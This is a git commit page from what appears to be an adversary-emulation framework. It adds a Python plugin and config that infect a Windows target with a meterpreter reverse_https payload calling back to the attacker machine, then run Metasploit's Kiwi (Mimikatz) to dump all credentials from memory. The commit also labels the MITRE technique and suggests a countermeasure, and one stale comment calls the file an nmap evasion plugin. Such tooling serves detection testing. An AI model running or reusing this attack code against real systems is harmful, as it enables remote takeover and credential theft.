Metasploit kiwi added

pull/12/head
Thorsten Sick 3 years ago
parent b36416956c
commit 7cd2cba6bf

@ -0,0 +1,5 @@
###
# The kiwi command to use.
# See: https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz
# Some options: creds_all, creds_kerberos, creds msv, creds_ssp, creds_tspkg, creds_wdigest, wifi_list, wifi_list_shared
variant: creds_all

@ -0,0 +1,57 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
import socket
class MetasploitKiwiPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_kiwi"
description = "Extract credentials from memory. Kiwi is the more modern Mimikatz"
ttp = "t1003"
references = ["https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
self.attack_logger.start_narration("Extracting user credentials from memory.")
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
metasploit.kiwi(target,
variant=self.conf['variant'],
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
countermeasure="Memory access into critical processes should be monitored."
)
return res
Loading…
Cancel
Save